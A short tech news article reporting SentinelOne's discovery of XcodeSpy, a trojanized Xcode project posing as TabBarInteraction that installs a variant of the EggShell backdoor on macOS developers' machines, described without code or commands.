Security researchers discover ‘XcodeSpy’ malware targeting developers

Hot on the heels of a report detailing a surge in malware being developed for macOS, a new one has been discovered that’s specifically targeting developers.

As first reported today by Ars Technica, security researchers at SentinelOne have discovered a brand new malware developed specifically to target those creating apps. It’s actually a variant of the “EggShell” backdoor that’s been developed for Mac computers. However, with it being a variant, it’s still considered a new discovery.

With that in mind, the report outlines that the new malware is called “XcodeSpy”, which is developed as an Xcode project under the guise of TabBarInteraction. This is a legitimate open source project, and developers can be duped into downloading the malicious software because of this.

Developers who install “XcodeSpy” are trying to download TabBarInteraction, but this software includes an executable “run Script” which downloads and installs the EggShell backdoor. With this software installed on a device, the cybercriminal can then bypass the camera, microphone, and keyboard. The individual can also download and upload software at will.

The initial timeline for this issue actually dates back to August of last year, with another variant cropping up in October. Per the report:

We have thus far been unable to discover other samples of trojanized Xcode projects and cannot gauge the extent of this activity. However, the timeline from known samples and other indicators mentioned below suggest that other XcodeSpy projects may exist. By sharing details of this campaign, we hope to raise awareness of this attack vector and highlight the fact that developers are high-value targets for attackers.

At the time of publication, there is no fix for this particular issue, it seems. With that in mind, the security researchers say that the best possible solution for developers is to be wary of open source projects while utilizing Xcode.